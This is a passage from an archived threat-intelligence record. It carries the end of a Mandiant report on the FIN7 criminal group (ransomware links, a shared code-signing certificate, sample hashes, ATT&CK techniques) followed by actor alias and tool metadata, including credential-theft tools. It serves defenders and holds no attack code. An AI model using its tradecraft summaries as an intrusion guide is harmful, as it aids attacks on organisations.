In these campaigns, we observed both WINGNIGHT and\r\nFLYHIGH leading to BIRDWATCH, often leveraging additional compromised domains for both the download\r\nserver and the BIRDWATCH C2 controller. We’ve observed limited overlaps between UNC3381 and FIN7\r\ninfrastructure as well, including the use of the same DNS provider and AS.\r\nFIN7 and Ransomware\r\nMandiant published finished intelligence in 2020 which outlined evidence of FIN7’s possible shift in monetization\r\nof intrusions from payment card data to extortion operations. Although FIN7’s operations have shifted\r\nsubstantially when compared to their older activity, as of publishing this report, Mandiant has not attributed any\r\ndirect deployment of ransomware to FIN7. However, the possibility that FIN7 actors are engaging in ransomware\r\noperations is also substantiated by evidence outside of our intrusion data holdings and includes code usage, actor\r\ninfrastructure, and trusted third party sources.\r\nIn at least two incident response engagements in 2020, FIN7 intrusion operations were identified prior to\r\nransomware encryption, including the use of MAZE and RYUK. Similarly in 2021, Mandiant attributed active\r\nFIN7 intrusion activity during an incident response engagement involving ALPHV ransomware. In all these cases,\r\nthe ransomware deployment is currently attributed to separately tracked threat groups due to factors of the\r\ninvestigation and our visibility.\r\nIn addition to evidence produced from intrusion data, secondary artifacts suggest FIN7 played a role in at least\r\nsome DARKSIDE operations. A low global prevalence code signing certificate used by FIN7 in 2021 to sign\r\nBEACON and BEAKDROP samples was also used to sign multiple unattributed DARKSIDE samples recovered\r\nin the wild (Table 3). 
The code signing certificate mentioned above, used by FIN7, contained the SSL subject\r\ncommon name of “OASIS COURT LIMITED” (Figure 26).\r\nSerial Number:\r\n e4:e7:95:fd:1f:d2:55:95:b8:69:ce:22:aa:7d:c4:9f\r\n Signature Algorithm: sha256WithRSAEncryption\r\n Issuer: C = GB, ST = Greater Manchester, L = Salford, O = Sectigo Limited, CN = Sectigo RSA Code Signing\r\n Validity\r\n Not Before: Dec 21 00:00:00 2020 GMT\r\n Not After : Dec 21 23:59:59 2021 GMT\r\n Subject: C = GB, postalCode = CO3 9FA, ST = Essex, L = Colchester, street = 10 Stoneleigh Park, O = OASI\r\nFigure 26: Code signing certificate used by FIN7, also used to sign multiple DARKSIDE ransomware samples\r\nFile MD5 Note\r\nab29b9e225a05bd17e919e1d0587289e DNS BEACON\r\n1c3b19163a3b15b39ae00bbe131b499a DARKSIDE\r\n230a681ebbcdba7ae2175f159394d044 DARKSIDE\r\nbf41fc54f96d0106d34f1c48827006e4 DARKSIDE\r\nc4da0137cbb99626fd44da707ae1bca8 DARKSIDE\r\n28e9581ab34297b6e5f817f93281ffac FIN7 BEACON\r\n38786bc9de1f447d0187607eaae63f11 FIN7 BEACON\r\n6fba605c2a02fc62e6ff1fb8e932a935 FIN7 BEAKDROP\r\nTable 3: Files signed with code certificate\r\nConclusion\r\nDespite indictments of members of FIN7 in 2018 and a related sentencing in 2021 announced by the U.S.\r\nDepartment of Justice, at least some members of FIN7 have remained active and continue to evolve their criminal\r\noperations over time. Throughout their evolution, FIN7 has increased the speed of their operational tempo, the\r\nscope of their targeting, and even possibly their relationships with other ransomware operations in the\r\ncybercriminal underground.\r\nAcknowledgements\r\nThank you to Van Ta, Rufus Brown, Dan Perez, Barry Vengerik, Kimberly Goody and Andrew Thompson for a\r\ntechnical review of this content and FIN7 research involved behind-the-scenes. 
In addition, thank you to all\r\nMandiant Incident Response and Managed Defense responders for harvesting the valuable intrusion data that\r\nenables our research.\r\nIndicators of Compromise (IOCs)\r\nMandiant Security Validation Actions\r\nOrganizations can validate their security controls against more than 25 actions with Mandiant Security Validation.\r\nVID Name\r\nA150-527 Command and Control - FIN7, BATELEUR, Check-in\r\nA150-528 Command and Control - FIN7, GRIFFON, Check-in\r\nA151-165 Command and Control - FIN7, GRIFFON, DNS Query #1\r\nA151-166 Command and Control - FIN7, GRIFFON, DNS Query #2\r\nA104-585 Host CLI - FIN7, Local Javascript Execution via WMI and Mshta\r\nA150-546 Malicious File Transfer - FIN7, CARBANAK, Download, Variant #1\r\nA150-548 Malicious File Transfer - FIN7, CARBANAK, Download, Variant #3\r\nA150-710 Malicious File Transfer - FIN7, DICELOADER, Download, Variant #1\r\nA150-549 Malicious File Transfer - FIN7, DRIFTPIN, Download, Variant #1\r\nA150-550 Malicious File Transfer - FIN7, DRIFTPIN, Download, Variant #2\r\nA151-168 Malicious File Transfer - FIN7, GRIFFON, Download, JavaScript Variant\r\nA150-553 Malicious File Transfer - FIN7, GRIFFON, Download, Variant #1\r\nA150-554 Malicious File Transfer - FIN7, GRIFFON, Download, Variant #2\r\nA150-555 Malicious File Transfer - FIN7, GRIFFON, Download, Variant #3\r\nA150-572 Malicious File Transfer - FIN7, SUPERSOFT, Download, Variant #1\r\nA150-729 Malicious File Transfer - FIN7, TAKEOUT, Download, Variant #1\r\nA150-730 Malicious File Transfer - FIN7, TAKEOUT, Download, Variant #2\r\nA150-731 Malicious File Transfer - FIN7, TAKEOUT, Download, Variant #3\r\nA150-585 Phishing Email - Malicious Attachment, FIN7, BATELEUR DOC Lure\r\nA150-586 Phishing Email - Malicious Attachment, FIN7, GRIFFON DOCM Lure\r\nA151-167 Phishing Email - Malicious Attachment, 
FIN7, GRIFFON, Windows 11 Themed Lure\r\nA150-587 Phishing Email - Malicious Attachment, FIN7, Tracking Pixel\r\nA150-590 Protected Theater - FIN7, BATELEUR, Execution\r\nA151-044 Protected Theater - FIN7, CARBANAK, Execution\r\nA150-366 Protected Theater - FIN7, CULTSWAP, Execution\r\nA150-591 Protected Theater - FIN7, GRIFFON, Execution\r\nA151-170 Protected Theater - FIN7, GRIFFON, Execution, JavaScript Variant\r\nA151-169 Protected Theater - FIN7, GRIFFON, Execution, Word Document Variant\r\nMITRE ATT\u0026CK Mapping\r\nThroughout 2020 and 2021, Mandiant has observed FIN7 use the following techniques:\r\nExecution\r\nT1059: Command and Scripting Interpreter\r\nT1059.001: PowerShell\r\nT1059.003: Windows Command Shell\r\nT1059.005: Visual Basic\r\nT1059.007: JavaScript\r\nT1204.001: Malicious Link\r\nT1204.002: Malicious File\r\nT1569.002: Service Execution\r\nInitial Access\r\nT1195.002: Compromise Software Supply Chain\r\nT1199: Trusted Relationship\r\nT1566.001: Spearphishing Attachment\r\nT1566.002: Spearphishing Link\r\nImpact\r\nT1491.002: External Defacement\r\nResource Development\r\nT1583.003: Virtual Private Server\r\nT1588.003: Code Signing Certificates\r\nT1588.004: Digital Certificates\r\nT1608.003: Install Digital Certificate\r\nT1608.005: Link Target\r\nDefense Evasion\r\nT1027: Obfuscated Files or Information\r\nT1027.005: Indicator Removal from Tools\r\nT1036: Masquerading\r\nT1036.003: Rename System Utilities\r\nT1055: Process Injection\r\nT1070.004: File Deletion\r\nT1140: Deobfuscate/Decode Files or Information\r\nT1218.010: Regsvr32\r\nT1218.011: Rundll32\r\nT1497.001: System Checks\r\nT1553.002: Code Signing\r\nT1564.003: Hidden Window\r\nT1620: Reflective Code Loading\r\nCollection\r\nT1113: Screen Capture\r\nT1213: Data from Information Repositories\r\nT1560: Archive Collected 
Data\r\nLateral Movement\r\nT1021.001: Remote Desktop Protocol\r\nT1021.004: SSH\r\nCommand and Control\r\nT1071.001: Web Protocols\r\nT1090: Proxy\r\nT1095: Non-Application Layer Protocol\r\nT1105: Ingress Tool Transfer\r\nT1132.001: Standard Encoding\r\nT1573.002: Asymmetric Cryptography\r\nDiscovery\r\nT1012: Query Registry\r\nT1033: System Owner/User Discovery\r\nT1057: Process Discovery\r\nT1069: Permission Groups Discovery\r\nT1069.002: Domain Groups\r\nT1082: System Information Discovery\r\nT1083: File and Directory Discovery\r\nT1087: Account Discovery\r\nT1087.002: Domain Account\r\nT1482: Domain Trust Discovery\r\nT1518: Software Discovery\r\nCredential Access\r\nT1110.002: Password Cracking\r\nT1555.003: Credentials from Web Browsers\r\nT1558.003: Kerberoasting\r\nSource: https://www.mandiant.com/resources/blog/evolution-of-fin7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.mandiant.com/resources/blog/evolution-of-fin7"
	],
	"report_names": [
		"evolution-of-fin7"
	],
	"threat_actors": [
		{
			"id": "c9617bb6-45c8-495e-9759-2177e61a8e91",
			"created_at": "2022-10-25T15:50:23.405039Z",
			"updated_at": "2026-04-10T02:00:05.387643Z",
			"deleted_at": null,
			"main_name": "Carbanak",
			"aliases": [
				"Carbanak",
				"Anunak"
			],
			"source_name": "MITRE:Carbanak",
			"tools": [
				"Carbanak",
				"Mimikatz",
				"PsExec",
				"netsh"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "9de1979b-40fc-44dc-855d-193edda4f3b8",
			"created_at": "2025-08-07T02:03:24.92723Z",
			"updated_at": "2026-04-10T02:00:03.755516Z",
			"deleted_at": null,
			"main_name": "GOLD LOCUST",
			"aliases": [
				"Anunak",
				"Carbanak",
				"Carbon Spider ",
				"FIN7 ",
				"Silicon "
			],
			"source_name": "Secureworks:GOLD LOCUST",
			"tools": [
				"Carbanak"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "f6f91e1c-9202-4497-bf22-9cd5ef477600",
			"created_at": "2023-01-06T13:46:38.86765Z",
			"updated_at": "2026-04-10T02:00:03.12735Z",
			"deleted_at": null,
			"main_name": "WIZARD SPIDER",
			"aliases": [
				"TEMP.MixMaster",
				"GOLD BLACKBURN",
				"DEV-0193",
				"UNC2053",
				"Pistachio Tempest",
				"DEV-0237",
				"Storm-0230",
				"FIN12",
				"Periwinkle Tempest",
				"Storm-0193",
				"Trickbot LLC"
			],
			"source_name": "MISPGALAXY:WIZARD SPIDER",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "bb8702c5-52ac-4359-8409-998a7cc3eeaf",
			"created_at": "2023-01-06T13:46:38.405479Z",
			"updated_at": "2026-04-10T02:00:02.961112Z",
			"deleted_at": null,
			"main_name": "FIN7",
			"aliases": [
				"ATK32",
				"G0046",
				"G0008",
				"Sangria Tempest",
				"ELBRUS",
				"GOLD NIAGARA",
				"Coreid",
				"Carbanak",
				"Carbon Spider",
				"JokerStash",
				"CARBON SPIDER"
			],
			"source_name": "MISPGALAXY:FIN7",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6e23ce43-e1ab-46e3-9f80-76fccf77682b",
			"created_at": "2022-10-25T16:07:23.303713Z",
			"updated_at": "2026-04-10T02:00:04.530417Z",
			"deleted_at": null,
			"main_name": "ALPHV",
			"aliases": [
				"ALPHV",
				"ALPHVM",
				"Ambitious Scorpius",
				"BlackCat Gang",
				"UNC4466"
			],
			"source_name": "ETDA:ALPHV",
			"tools": [
				"ALPHV",
				"ALPHVM",
				"BlackCat",
				"GO Simple Tunnel",
				"GOST",
				"Impacket",
				"LaZagne",
				"MEGAsync",
				"Mimikatz",
				"Munchkin",
				"Noberus",
				"PsExec",
				"Remcom",
				"RemoteCommandExecution",
				"WebBrowserPassView"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "ed3810b7-141a-4ed0-8a01-6a972b80458d",
			"created_at": "2022-10-25T16:07:23.443259Z",
			"updated_at": "2026-04-10T02:00:04.602946Z",
			"deleted_at": null,
			"main_name": "Carbanak",
			"aliases": [
				"Anunak",
				"Carbanak",
				"Carbon Spider",
				"ELBRUS",
				"G0008",
				"Gold Waterfall",
				"Sangria Tempest"
			],
			"source_name": "ETDA:Carbanak",
			"tools": [
				"AVE_MARIA",
				"Agentemis",
				"AmmyyRAT",
				"Antak",
				"Anunak",
				"Ave Maria",
				"AveMariaRAT",
				"BABYMETAL",
				"BIRDDOG",
				"Backdoor Batel",
				"Batel",
				"Bateleur",
				"BlackMatter",
				"Boostwrite",
				"Cain \u0026 Abel",
				"Carbanak",
				"Cl0p",
				"Cobalt Strike",
				"CobaltStrike",
				"DNSMessenger",
				"DNSRat",
				"DNSbot",
				"DRIFTPIN",
				"DarkSide",
				"FOXGRABBER",
				"FlawedAmmyy",
				"HALFBAKED",
				"JS Flash",
				"KLRD",
				"MBR Eraser",
				"Mimikatz",
				"Nadrac",
				"Odinaff",
				"POWERPIPE",
				"POWERSOURCE",
				"PsExec",
				"SQLRAT",
				"Sekur",
				"Sekur RAT",
				"SocksBot",
				"SoftPerfect Network Scanner",
				"Spy.Agent.ORM",
				"TEXTMATE",
				"TeamViewer",
				"TiniMet",
				"TinyMet",
				"Toshliph",
				"VB Flash",
				"WARPRISM",
				"avemaria",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f4f16213-7a22-4527-aecb-b964c64c2c46",
			"created_at": "2024-06-19T02:03:08.090932Z",
			"updated_at": "2026-04-10T02:00:03.6289Z",
			"deleted_at": null,
			"main_name": "GOLD NIAGARA",
			"aliases": [
				"Calcium ",
				"Carbanak",
				"Carbon Spider ",
				"FIN7 ",
				"Navigator ",
				"Sangria Tempest ",
				"TelePort Crew "
			],
			"source_name": "Secureworks:GOLD NIAGARA",
			"tools": [
				"Bateleur",
				"Carbanak",
				"Cobalt Strike",
				"DICELOADER",
				"DRIFTPIN",
				"GGLDR",
				"GRIFFON",
				"JSSLoader",
				"Meterpreter",
				"OFFTRACK",
				"PILLOWMINT",
				"POWERTRASH",
				"SUPERSOFT",
				"TAKEOUT",
				"TinyMet"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "63061658-5810-4f01-9620-7eada7e9ae2e",
			"created_at": "2022-10-25T15:50:23.752974Z",
			"updated_at": "2026-04-10T02:00:05.244531Z",
			"deleted_at": null,
			"main_name": "Wizard Spider",
			"aliases": [
				"Wizard Spider",
				"UNC1878",
				"TEMP.MixMaster",
				"Grim Spider",
				"FIN12",
				"GOLD BLACKBURN",
				"ITG23",
				"Periwinkle Tempest",
				"DEV-0193"
			],
			"source_name": "MITRE:Wizard Spider",
			"tools": [
				"TrickBot",
				"AdFind",
				"BITSAdmin",
				"Bazar",
				"LaZagne",
				"Nltest",
				"GrimAgent",
				"Dyre",
				"Ryuk",
				"Conti",
				"Emotet",
				"Rubeus",
				"Mimikatz",
				"Diavol",
				"PsExec",
				"Cobalt Strike"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "a2d3f35f-3b29-4509-bff5-af2638140d39",
			"created_at": "2022-10-25T16:07:23.633982Z",
			"updated_at": "2026-04-10T02:00:04.695802Z",
			"deleted_at": null,
			"main_name": "FIN12",
			"aliases": [],
			"source_name": "ETDA:FIN12",
			"tools": [
				"Agentemis",
				"BEERBOT",
				"BazarBackdoor",
				"BazarCall",
				"BazarLoader",
				"Cobalt Strike",
				"CobaltStrike",
				"KEGTAP",
				"TSPY_TRICKLOAD",
				"Team9Backdoor",
				"The Trick",
				"TheTrick",
				"Totbrick",
				"TrickBot",
				"TrickLoader",
				"bazaloader",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "bfded1cf-be73-44f9-a391-0751c9996f9a",
			"created_at": "2022-10-25T15:50:23.337107Z",
			"updated_at": "2026-04-10T02:00:05.252413Z",
			"deleted_at": null,
			"main_name": "FIN7",
			"aliases": [
				"FIN7",
				"GOLD NIAGARA",
				"ITG14",
				"Carbon Spider",
				"ELBRUS",
				"Sangria Tempest"
			],
			"source_name": "MITRE:FIN7",
			"tools": [
				"Mimikatz",
				"AdFind",
				"JSS Loader",
				"HALFBAKED",
				"REvil",
				"PowerSploit",
				"CrackMapExec",
				"Carbanak",
				"Pillowmint",
				"Cobalt Strike",
				"POWERSOURCE",
				"RDFSNIFFER",
				"SQLRat",
				"Lizar",
				"TEXTMATE",
				"BOOSTWRITE"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d85adfe3-e1c3-40b0-b8bb-d1bacadc4d82",
			"created_at": "2022-10-25T16:07:23.619566Z",
			"updated_at": "2026-04-10T02:00:04.690061Z",
			"deleted_at": null,
			"main_name": "FIN7",
			"aliases": [
				"APT-C-11",
				"ATK 32",
				"G0046",
				"Gold Niagara",
				"GrayAlpha",
				"ITG14",
				"TAG-CR1"
			],
			"source_name": "ETDA:FIN7",
			"tools": [
				"7Logger",
				"Agentemis",
				"Anubis Backdoor",
				"Anunak",
				"Astra",
				"BIOLOAD",
				"BIRDWATCH",
				"Bateleur",
				"Boostwrite",
				"CROWVIEW",
				"Carbanak",
				"Cobalt Strike",
				"CobaltStrike",
				"DICELOADER",
				"DNSMessenger",
				"FOWLGAZE",
				"HALFBAKED",
				"JSSLoader",
				"KillACK",
				"LOADOUT",
				"Lizar",
				"Meterpreter",
				"Mimikatz",
				"NetSupport",
				"NetSupport Manager",
				"NetSupport Manager RAT",
				"NetSupport RAT",
				"NetSupportManager RAT",
				"POWERPLANT",
				"POWERSOURCE",
				"RDFSNIFFER",
				"Ragnar Loader",
				"SQLRAT",
				"Sardonic",
				"Sekur",
				"Sekur RAT",
				"TEXTMATE",
				"Tirion",
				"VB Flash",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434115,
	"ts_updated_at": 1775792153,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c55324769777bee7344616b11f5823104754d75c.pdf",
		"text": "https://archive.orkl.eu/c55324769777bee7344616b11f5823104754d75c.txt",
		"img": "https://archive.orkl.eu/c55324769777bee7344616b11f5823104754d75c.jpg"
	}
}